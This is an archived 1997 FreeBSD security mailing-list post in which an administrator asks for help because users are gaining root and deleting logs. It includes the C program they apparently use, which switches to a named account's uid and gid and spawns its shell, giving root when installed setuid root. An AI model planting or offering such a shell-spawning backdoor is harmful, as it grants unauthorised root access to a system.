Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 10 Jun 1997 22:54:54 GMT
From:      Yuang Shuang-Long <edward@FreeBSD.cs.nccu.edu.tw>
To:        freebsd-security@freebsd.org
Message-ID:  <199706102254.WAA02221@FreeBSD.cs.nccu.edu.tw>

next in thread | raw e-mail | index | archive | help
  Hi! folks:
	I have a trouble that some users use the following prog. to get
  root privilege, and the more they do some destructive thing. (eg. 
  delete some file /var/log/* :-( ) I need your help...


**********************************************************************



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>

#if 0
          struct passwd {
              char *pw_name;    /* user's login name */
              char *pw_passwd;  /* no longer used */
              uid_t pw_uid;        /* user's uid */
              gid_t pw_gid;        /* user's gid */
              char *pw_age;     /* not used */
              char *pw_comment; /* not used */
              char *pw_gecos;   /* typically user's full name */
              char *pw_dir;     /* user's home dir */
              char *pw_shell;   /* user's login shell */
          };
#endif

void
main(int argc, char *argv[])
{
	struct passwd *pw;

	if(argc < 2) {
		fprintf(stderr, "too few argument\n");
		exit(-1);
	}
	if((pw = getpwnam(argv[1])) == NULL) {
		perror(argv[1]);
		exit(-1);
	}
	printf("uid:%d gid:%d home:%s shell:%s\n", pw->pw_uid, pw->pw_gid, 
		pw->pw_dir, pw->pw_shell);
	if(setgid(pw->pw_gid) == -1)
		perror("setgid");
	if(setuid(pw->pw_uid) == -1)
		perror("setuid");
	chdir(pw->pw_dir);
	system(pw->pw_shell);
}

*************************************************************************



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199706102254.WAA02221>